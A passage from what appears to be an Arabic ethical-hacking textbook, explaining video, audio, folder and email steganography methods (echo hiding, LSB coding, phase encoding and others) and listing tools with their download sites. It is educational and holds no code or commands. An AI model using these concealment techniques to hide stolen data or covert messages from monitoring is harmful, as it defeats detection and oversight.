‫اﻟﻣﺗﺎﺣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور او ﺑداﺧل اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ ﯾﻣﻛن ﺗطﺑﻘﮭﺎ أﯾﺿﺎ ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻔﯾدﯾو‪ .‬وﯾﻣﻛن اﺳﺗﺧداﻣﮫ‬
‫ﻹﺧﻔﺎء ﻋدد ﻛﺑﯾر ﻣن اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‪.‬‬
‫‪Video Steganography: OmniHide PRO‬‬
‫اﻟﻣﺻدر‪http://omnihide.com :‬‬
‫‪ OmniHide PRO‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء أي ﻣﻠف ﺳري داﺧل ﺻورة ﻏﯾر ﺿﺎره‪ ،‬ﻓﯾدﯾو‪ ،‬ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ‪ ،‬وﻣﺎ اﻟﻰ ذﻟك‪ .‬اﻟﻣﻠف اﻟﻧﺎﺗﺞ‪Stego‬‬
‫ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ أو ﻣﺷﺎرﻛﺗﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ ﻣﺛل اﻟﻣﻠﻔﺎت اﻟﻌﺎدﯾﺔ دون أن ﯾﻌﻠم أﺣد أن ﺷﯾﺋﺎ ﻣﺧﻔﯾﺎ ﺑداﺧﻠﮭﺎ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﻣﻛن ھذه اﻷداة ﺑﺣﻔظ اﻟﻣﻠف‬
‫اﻟﺳري اﻟﺧﺎص ﺑك ﻣن أﻋﯾن اﻟﻣﺗطﻔﻠﯾن‪ .‬ﻓﺈﻧﮫ ﯾﺗﯾﺢ ﻟك أﯾﺿﺎ إﺿﺎﻓﺔ ﻛﻠﻣﺔ ﻣرور ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻟﺗﻌزﯾز اﻷﻣن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪471‬‬

‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬ﯾﺳﻣﺢ ﻟك إﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻور‪ ،‬أﻓﻼم‪ ،‬اﻟﻣﺳﺗﻧدات‪ ،‬واﻟﻣوﺳﯾﻘﻰ اﻟﺦ‪.‬‬
‫‪ -‬ﻟم ﺗﺿﻊ أي ﻣن اﻟﻘﯾود ﻋﻠﻰ ﻧوع اﻟﻣﻠف واﻟﺣﺟم اﻟذي ﺗرﯾد إﺧﻔﺎءه‪.‬‬

‫‪Video Steganography Tools‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ اﻟﺗطﺑﯾﻖ ‪ ،PRO‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻣﻠف اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ‬
‫ﻣﻠﻔﺎت اﻟﻔﯾدﯾو‪:‬‬
‫‪Our Secret available at http://www.securekit.net‬‬
‫‪RT Steganography available at http://rtstegvideo.sourceforge.net‬‬
‫‪Masker available at http://www.softpuls.com‬‬
‫‪Max File Encryption available at http://www.softeza.com‬‬
‫‪MSU Stegovideo available at http://www.compression.ru‬‬
‫‪BDV DataHider available at http://www.bdvnotepad.com‬‬
‫‪Stegostick available at http://sourceforge.net‬‬
‫‪OpenPuff available at http://embeddedsw.net‬‬
‫‪Stegsecret available at http://stegsecret.sourceforge.net‬‬
‫‪PSM Encryptor available at http://www.softpedia.com/get/Security/Encrypting/PSM-Encryptor.shtml‬‬

‫‪Audio Steganography‬‬

‫‪ Audio steganography‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠف اﻟﺻوت ﻣﺛل‪ ،AU ، WAV‬وﺣﺗﻰ ﻣﻠﻔﺎت ‪MP3‬‬
‫اﻟﺻوﺗﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺿﻣن اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ ﻋن طرﯾﻖ ﺗﻐﯾﯾر طﻔﯾف ﻓﻲ ﺗﺳﻠﺳل ﺛﻧﺎﺋﻲ ﻣن اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬اﻟﺗﻐﯾﯾرات ﻓﻲ‬
‫اﻟﻣﻠف اﻟﺻوﺗﻲ ﺑﻌد اﻹدراج ﻻ ﯾﻣﻛن أن ﯾﺗم ﻛﺷﻔﮭﺎ‪ ،‬ﻟذﻟك ھذا ﯾؤﻣن اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن أﻋﯾن اﻟﻣﺗطﻔﻠﯾن‪.‬‬

‫ﺗﺣﺗﺎج إﻟﻰ اﻟﺗﺄﻛد ﻣن أن اﻟﻣﻠف اﻟﺻوﺗﻲ اﻟﻧﺎﻗل ﻻ ﯾﻧﺑﻐﻲ أن ﯾﺗدھور ﺑﺷﻛل ﻛﺑﯾر ﺑﺳﺑب اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﻣدﻣﺟﺔ؛ ﻋﻠﻰ اﻟﺟﺎﻧب اﻻﺧر‪ ،‬ﯾﻣﻛن‬
‫‪) eavesdropper‬اﻟﻣﺗﻧﺻت( ﻣن اﻟﻛﺷف ﻋن وﺟود رﺳﺎﻟﺔ ﺳرﯾﮫ ﻣﺧﺑﺄه ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬ﻟذﻟك ﯾﺟب ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﺑطرﯾﻘﮫ ﻣﺎ‬
‫ﺑﺣﯾث ﯾﻛون ھﻧﺎك ﺗﻐﯾﯾرا طﻔﯾﻔﺎ ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ اﻟذي ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﻣن ﻗﺑل اﻹﻧﺳﺎن‪ .‬ﯾﻣﻛن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‬
‫ﺑﺎﺳﺗﺧدام ‪ LSB‬أو ﺑﺎﺳﺗﺧدام ﺗرددات اﻟﺗﻲ ھﻲ ﻏﯾر ﻣﺳﻣوﻋﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻸذن اﻟﺑﺷرﯾﺔ )‪.(>20,000Hz‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪472‬‬

‫‪) Audio Steganography Methods‬طﺮق إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت ﻓﻲ اﻟﻤﻠﻔﺎت اﻟﺼﻮﺗﯿﺔ(‬

‫ھﻧﺎك ﺑﻌض اﻟطرق اﻟﻣﺗﺎﺣﺔ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪ .‬ﺑﻌض اﻷﺳﺎﻟﯾب ﺗﻘوم ﺑﺗﻧﻔﯾذ اﻟﺧوارزﻣﯾﺔ اﻟﺗﻲ ﺗﻘوم ﻋﻠﻰ‬
‫إدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻋﻠﻰ ﺷﻛل إﺷﺎرة اﻟﺿوﺿﺎء)‪ ، (noise signal‬ﺑﯾﻧﻣﺎ اﻟﺑﻌض اﻻﺧر ﯾﺳﺗﺧدم أﺳﺎﻟﯾب أﺧرى ﻓﻲ ‪exploiting‬‬
‫)اﺧﺗراق( ﺗﻘﻧﯾﺎت ﻣﻌﺎﻟﺟﺔ اﻹﺷﺎرات اﻟﻣﺗطورة ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫ﺗﺳﺗﺧدم اﻷﺳﺎﻟﯾب اﻟﺗﺎﻟﯾﺔ ﻟﺗﻧﻔﯾذ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪:‬‬

‫‪Echo Data Hiding -1‬‬


‫ﻓﻲ ‪ ،the echo data hiding method‬ﯾﺗم ﺗﺿﻣﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ داﺧل إﺷﺎرة ﻧﺎﻗل اﻟﺻوت ﻋن طرﯾﻖ إدﺧﺎل ﺻدى )‪(Echo‬ﻓﻲ‬
‫ذﻟك‪ .‬ﯾﺳﺗﺧدم ﺛﻼث ﻣﻌﺎﻣﻼت ﻣن اﻟﺻدى)‪ ،(Echo‬وھم اﻟﺳﻌﺔ اﻷوﻟﯾﺔ)‪ ، (initial amplitude‬ﻣﻌدل اﻻﻧﺣﻼل)‪ ، (decay rate‬اﻟﺗﺄﺧﯾر‬
‫)‪ (offset or delay‬وذﻟك ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ .‬ﻋﻧد اﻹزاﺣﺔ ﺑﯾن إﺷﺎرة اﻟﻧﺎﻗل )‪ (Carrier signal‬واﻧﺧﻔﺎض اﻟﺻدى)‪، (echo decreases‬‬
‫ﻓﺎن ھذﯾن اﻹﺷﺎرﺗﯾن ﺳوف ﯾﺧﺗﻠطوا ﻋﻧد ﻧﻘطﺔ ﻣﻌﯾﻧﺔ ﻣن اﻟزﻣن ﺣﯾث أﻧﮫ ﻣن ﻏﯾر اﻟﻣﻣﻛن ﻟﻸذن اﻟﺑﺷرﯾﺔ اﻟﺗﻣﯾﯾز ﺑﯾن ھذه إﺷﺎرة اﺛﻧﯾن‪ .‬ﻋﻧد ھذه‬
‫اﻟﻧﻘطﺔ‪ ،‬ﯾﻣﻛن أن ﯾﺳﻣﻊ ﻟﺻوت اﻟﺻدى)‪ (Echo sound‬ﺑﺎﻋﺗﺑﺎره ﺻدى ﻣﺿﺎﻓﮫ إﻟﻰ اﻹﺷﺎرة اﻷﺻﻠﯾﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬ھذه اﻟﻧﻘطﺔ ﻣن ﻋدم ﺗﻣﯾز‬
‫اﻷﺻوات ﯾﻌﺗﻣد ﻋﻠﻰ ﻋواﻣل ﻣﺛل ﻧوﻋﯾﺔ إﺷﺎرة اﻟﺻوت اﻷﺻﻠﻲ‪ ،‬وﻧوع اﻟﺻوت‪ ،‬واﻟﻣﺳﺗﻣﻊ‪.‬‬
‫ﻟﺗﺷﻔﯾر اﻻﺷﺎرة اﻟﻧﺎﺗﺟﺔ ﻓﻲ اﻟﺷﻛل اﻟﺛﻧﺎﺋﻲ )‪ ،(Binary form‬ﯾﺗم اﺳﺗﺧدام اﺛﻧﯾن ﻣن ‪) delay times‬وﻗت اﻟﺗﺄﺧﯾر( اﻟﻣﺧﺗﻠﻔﺔ‪ .‬وﯾﻧﺑﻐﻲ أن ﺗﻛون‬
‫أوﻗﺎت اﻟﺗﺄﺧﯾر ھذه أدﻧﻰ ﻣن اﻹدراك اﻟﺑﺷري‪ .‬وﯾﻧﺑﻐﻲ أﯾﺿﺎ ﺗﻌﯾﯾن اﻟﻣﻌﺎﻣﻼت ﻣﺛل اﻟﺳﻌﺔ اﻷوﻟﯾﺔ)‪ (initial amplitude‬وﻣﻌدل اﻻﻧﺣﻼل‬
‫)‪ (decay rate‬أدﻧﻰ ﻣن اﻟﻘﯾم اﻟﻣﺳﻣوﻋﺔ ﺑﺣﯾث ﯾﺻﺑﺢ اﻟﺻوت ﻟﯾس ﻣﺳﻣوﻋﺎ ﻋﻠﻰ اﻹطﻼق‪.‬‬
‫‪Spread Spectrum Method -2‬‬
‫ﻓﻲ ھذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﺗم ﻧﺷر اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻋﺑر أﻛﺑر ﻗدر ﻣﻣﻛن ﻣن اﻟطﯾف اﻟﺗرددي)‪ . (frequency spectrum‬ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب‬
‫ﻧﺳﺧﺗﯾن ﻣن اﻧﺗﺷﺎر اﻟطﯾف)‪ (spread spectrum‬وھﻣﺎ‪:‬‬
‫)‪ Direct sequence spread spectrum (DSSS‬و )‪frequency hopping spread spectrum (FHSS‬‬
‫ﻓﻲ‪ ، DSSS‬ﯾﺗم ﻧﺷر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن ﻗﺑل ‪) chip rate‬ﺛﺎﺑت( ﺛم ﯾﺗم ﺗﺿﻣﯾﻧﮫ ﻣﻊ اﺷﺎرة ﻋﺷواﺋﯾﺔ زاﺋﻔﮫ)‪(pseudo-random signal‬‬
‫واﻟﺗﻲ ﯾﺗم ﺗﺷﺎﺑﻛﮭﺎ ﻣﻊ اﻹﺷﺎرة اﻟﻐطﺎء‪.‬‬
‫ﻓﻲ ‪ ،FHSS‬ﯾﺗم ﺗﺑدﯾل طﯾف ﺗرددات اﻟﻣﻠف اﻟﺻوﺗﻲ ﻟذﻟك ﻓﺄﻧﮫ ﯾﻘﻔز ﺑﺳرﻋﮫ ﺑﯾن اﻟﺗرددات‪ .‬طرﯾﻘﺔ اﻧﺗﺷﺎر اﻟطﯾف ﯾﻠﻌب دورا رﺋﯾﺳﯾﺎ ﻓﻲ‬
‫اﻻﺗﺻﺎﻻت اﻵﻣﻧﺔ‪ ،‬ﺳواء اﻟﺗﺟﺎرﯾﺔ واﻟﻌﺳﻛرﯾﺔ‪.‬‬
‫‪LSB Coding -3‬‬
‫‪ LSB encoding‬ﺗﻌﻣل ﻣﺛل ﺗﻘﻧﯾﺔ ‪ LSB insertion‬واﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ إدراج اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺛﻧﺎﺋﯾﺔ)‪ (BINARY‬ﻓﻲ اﻟﺑت اﻷﻗل أھﻣﯾﺔ ﻟﻛل‬
‫ﻧﻘطﺔ ﻣن إﺷﺎرة اﻟﺻوت‪ .‬ھذه اﻟطرﯾﻘﺔ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻛﻣﯾﺎت ﻛﺑﯾرة ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ .‬ﻓﻣن اﻟﻣﻣﻛن اﺳﺗﺧدام اﺧر اﺛﻧﯾن ﻣن اﻟﺑت‬
‫ﻹدﺧﺎل اﻟﺑﯾﺎﻧﺎت اﻟﺛﻧﺎﺋﯾﺔ اﻟﺳرﯾﺔ وﻟﻛن اﻟﻣﺷﻛﻠﺔ أن ھذا ﺳوف ﯾﻧﺷﺎ ﺿوﺿﺎء ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬ھذه اﻟطرﯾﻘﺔ ﺗﻔﺗﻘر اﻟﻰ اﻻﻣن ﺣﯾث ان اﻟﺗﻼﻋب‬
‫ﻓﻲ ﻣﻠف اﻟﺻوت ﯾﺟﻌل ھذه اﻟطرﯾﻘﺔ أﻗل ﻋﻠﻰ اﻟﺗﻛﯾف‪ .‬اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﯾﻣﻛن اﻟﺗﻌرف ﻋﻠﯾﮭﺎ ﺑﺳﮭوﻟﺔ واﺳﺗﺧراﺟﮭﺎ ﺑﺳﺑب ﻗﻧﺎة اﻟﺿوﺿﺎء‬
‫)‪ (Channel noise‬و‪.resampling‬‬
‫‪Tone Insertion -4‬‬
‫ﯾﻧطوي ھذا اﻷﺳﻠوب ﻋﻠﻰ ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﻓﻲ إﺷﺎرة اﻟﺻوت ﻋن طرﯾﻖ إدﺧﺎل ﻧﻐﻣﺎت ﻣﻧﺧﻔﺿﺔ اﻟطﺎﻗﺔ‪ .‬اﻟﻧﻐﻣﺎت ﻣﻧﺧﻔﺿﺔ اﻟطﺎﻗﺔ ھذه ﻟﯾﺳت‬
‫ﻣﺳﻣوﻋﺔ ﻓﻲ وﺟود إﺷﺎرات اﻟﺻوت اﻷﻋﻠﻰ ﺑﻛﺛﯾر‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﻟﯾﺳت ﻣﺳﻣوﻋﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﺧﻔﻲ وﺟود اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎص ﺑك‪ .‬ﻓﻣن اﻟﺻﻌب‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪473‬‬

‫ﻟﻠﻐﺎﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺗﻧﺻت اﻟﻛﺷف ﻋن اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن إﺷﺎرة اﻟﺻوت‪ .‬ﯾﺳﺎﻋد ھذا اﻷﺳﻠوب ﻟﺗﺟﻧب اﻟﮭﺟﻣﺎت ﻣﺛل )‪(low-pass filtering‬‬
‫واﻗﺗطﺎع اﻟﺑﺎﯾت)‪. (bit truncation‬‬
‫ﺑراﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳﻣﻌﯾﺔ ﺗﻧﻔذ واﺣدة ﻣن ھذه اﻟطرق ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪.‬‬
‫‪Phase Encoding -5‬‬
‫‪ Phase coding‬ﯾﺗم وﺻﻔﮫ ﺑﺄﻧﮫ اﻟﻣرﺣﻠﺔ اﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ اﺳﺗﺑدال ﺷرﯾﺣﺔ اﻟﺻوت اﻷوﻟﯾﺔ ﺑﺎﻟﻣرﺣﻠﺔ اﻟﻣرﺟﻌﯾﺔ اﻟﺗﻲ ﺗﻣﺛل اﻟﺑﯾﺎﻧﺎت‪ .‬ﯾﻘوم ﺑﺗرﻣﯾز‬
‫ﺑﺗﺎت اﻟرﺳﺎﻟﺔ ﺳرﯾﺔ ﻛﺄﻧﮫ ﻣرﺣﻠﺔ اﻟﺗﺣوﯾﻼت )‪ (phase shift‬ﻓﻲ ﻣرﺣﻠﺔ اﻟطﯾف )‪ (phase spectrum‬ﻓﻲ اﻻﺷﺎرة اﻟرﻗﻣﯾﺔ‪ ،‬ﯾﺗم ﺗﺣﻘﯾﻖ‬
‫اﻟﺗرﻣﯾز )‪ (soft encoding‬ﻣن ﺣﯾث ﻧﺳﺑﺔ اﻹﺷﺎرة إﻟﻰ اﻟﺿوﺿﺎء )‪.(signal-to-noise ratio‬‬
‫‪Audio Steganography: Deepsound‬‬

‫اﻟﻣﺻدر‪http://jpinsoft.net/DeepSound :‬‬
‫‪ Deepsound‬ﯾﺳﺎﻋدك ﻋﻠﻰ إﺧﻔﺎء أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ)‪ . (WAV and FLAC‬ﯾﻣﻛﻧك اﺳﺗﺧدام ھذه اﻷداة‬
‫ﻟﺗﺿﻣﯾن رﺳﺎﻟﺔ ﺳرﯾﮫ ﺧﺎﺻﺔ ﺑك ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬وﺳوف ﺗﺳﻣﺢ ﻟك أﯾﺿﺎ ﻻﺳﺗﺧراج اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ﻣﺑﺎﺷرة ﻣن ﻣﺳﺎرات ﻗرص اﻟﺻوت‬
‫)‪ (Audio CD track‬ﻋﻧدﻣﺎ ﺗﻛون ﻓﻲ اﻟطرف اﻵﺧر‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﻌزﯾز اﻷﻣن‪.‬‬
‫ﻟﻠوﺻول إﻟﻰ اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﻣﻠف اﻟﻧﺎﻗل‪ ،‬ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺳﺗﻌرض اﻟﻣوﻗﻊ ﻣﻊ ﻣﺗﺻﻔﺢ ﻣﻠف ‪ Deepsound‬ﺛم اﻟﻧﻘر ﺑﺎﻟزر اﻷﯾﻣن ﻟﻠﻣﺎوس ﻓوق‬
‫اﻟﻣﻠف اﻟﺻوﺗﻲ ﻻﺳﺗﺧراج اﻟﻣﻠف اﻟﺳري اﻟﺧﺎص ﺑك‪.‬‬

‫‪Audio Steganography Tools‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام أدوات إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺻوﺗﯾﺔ اﻟﺗﺎﻟﯾﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪:‬‬
‫‪Mp3stegz available at http://sourceforge.net‬‬
‫‪MAXA Security Tools available at http://www.maxa-tools.com‬‬
‫‪BitCrypt available at http://bitcrypt.moshe-szweizer.com‬‬
‫‪MP3Stego available at http://www.petitcolas.net‬‬
‫‪Hide4PGP available at http://www.heinz-repp.onlinehome.de‬‬
‫‪CHAOS Universal available at http://safechaos.com‬‬
‫‪SilentEye available at http://www.silenteye.org‬‬
‫‪Quickcrypto available at http://www.quickcrypto.com‬‬
‫‪CryptArkan available at http://www.kuskov.com‬‬
‫‪Stegostick available at http://sourceforge.net‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪474‬‬

‫‪Folder Steganography‬‬
‫‪ Folder steganography‬ﯾﺷﯾر إﻟﻰ إﺧﻔﺎء ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ ﻓﻲ اﻟﻣﺟﻠدات‪ .‬ھذا ﯾﻣﻛن أن ﯾﺗﺣﻘﻖ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷداة ‪.Invisible Secrets 4‬‬
‫‪Folder Steganography: Invisible Secrets 4‬‬

‫اﻟﻣﺻدر‪http://www.invisiblesecrets.com :‬‬
‫‪ Invisible Secrets 4‬ھو ﺑرﻧﺎﻣﺞ ﻟﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت واﻟﺗﻲ ﺗﺣﺎﻓظ ﻋﻠﻰ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﻣﺟرﻣﻲ اﻹﻧﺗرﻧت وﯾﻣﻧﻊ اﻟﻣﮭﺎﺟﻣﯾن ﻣن‬
‫اﻻطﻼع ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك‪ .‬ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﻘوم ﺑﺗﺷﻔﯾر ﻟﯾس ﻓﻘط اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ واﻟﻣﻠﻔﺎت ﻟﺣﻔظﮭﺎ ﻓﻲ ﻣﻛﺎن آﻣن واﻟﻧﻘل اﻻﻣن ﻋﺑر‬
‫اﻟﺷﺑﻛﺔ‪ ،‬وﻟﻛن أﯾﺿﺎ ﯾﺧﻔﯾﮭم ﻓﻲ ﻣﺛل ھذا اﻟﻣﻛﺎن ﺑﺣﯾث ﻻ أﺣد ﯾﺳﺗطﯾﻊ اﻟﺗﻌرف ﻋﻠﯾﮭﺎ‪ .‬ﺣﺗﻰ اﻟﻣﮭﺎﺟم ﯾﺗﻌذر ﻓﻲ ﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪.‬‬
‫ﻋﻧد وﺿﻊ اﻟوﺛﺎﺋﻖ اﻟﺧﺎﺻﺔ ﻓﺄﻧﮭﺎ ﺗظﮭر ﻛﺄﻧﮭﺎ ﻻ ﺷﻲء ﻣﮭم‪ ،‬ﻣﺛل اﻟﺻور أو ﻣﻠﻔﺎت اﻟﺻوت أو ﺻﻔﺣﺎت اﻟوﯾب‪ ،‬وھذه اﻷﻧواع ﻣن اﻟﻣﻠﻔﺎت ھﻲ‬
‫ﺗﻣوﯾﮫ ﻣﺛﺎﻟﻲ ﻟﺗﺧزﯾن ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪ .‬ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ ﻟك ﺑﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﻣﺳﺗﻧدات ﻣﺑﺎﺷرة ﻋن ﻣﺳﺗﻛﺷف اﻟوﯾﻧدوز‪ ،‬وﻣن ﺛم‬
‫ﻧﻘﻠﮭﺎ آﻟﯾﺎ ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﻋﺑر اﻹﻧﺗرﻧت‪.‬‬

‫‪Folder Steganography Tools‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ‪ ،Invisible Secrets 4‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام اﻷدوات اﻟﺗﺎﻟﯾﺔ ﻛﺄدوات ‪ folder steganography‬ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬
‫اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﺟﻠدات‪:‬‬
‫‪Folder Lock available at http://www.newsoftwares.net‬‬
‫‪A+ Folder Locker available at http://www.giantmatrix.com‬‬
‫‪Toolwiz BSafe available at http://www.toolwiz.com‬‬
‫‪Hide Folders 2012 available at http://fspro.net‬‬
‫‪GiliSoft File Lock Pro available at http://www.gilisoft.com‬‬
‫‪Universal Shield available at http://www.everstrike.com‬‬
‫‪WinMend Folder Hidden available at http://www.winmend.com‬‬
‫‪Encrypted Magic Folders available at http://www.pc-magic.com‬‬
‫‪Quickcrypto available at http://quickcrypto.com‬‬
‫‪Max Folder Secure available at http://www.maxfoldersecure.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪475‬‬

‫‪Spam/Email Steganography‬‬

‫‪ Spam/email steganography‬ﯾﺷﯾر إﻟﻰ ﺗﻘﻧﯾﺔ إرﺳﺎل اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻋن طرﯾﻖ إﺧﻔﺎﺋﮭﺎ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻟﻣزﻋﺟﺔ‪/‬اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ‪ .‬رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﺑوﺻﻔﮭﺎ وﺳﯾﻠﺔ ﻟﻼﺗﺻﺎل اﻟﺳري ﻋن طرﯾﻖ دﻣﺞ اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﺑﻧﻔس‬
‫اﻟطرﯾﻘﺔ‪ ،‬وإﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﻣﺿﻣﻧﺔ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ‪ .‬ھذا اﻷﺳﻠوب ھو ﻣن اﻟﻣﻔﺗرض أن ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل ﻣﺧﺗﻠف‬
‫اﻟوﻛﺎﻻت اﻟﻌﺳﻛرﯾﺔ‪ ،‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ﺧوارزﻣﯾﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ھذا ﯾﻣﻛن ﺗﺣﻘﯾﻘﮫ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷداة ‪.Spam Mimic‬‬
‫‪Spam/Email Steganography: Spam Mimic‬‬

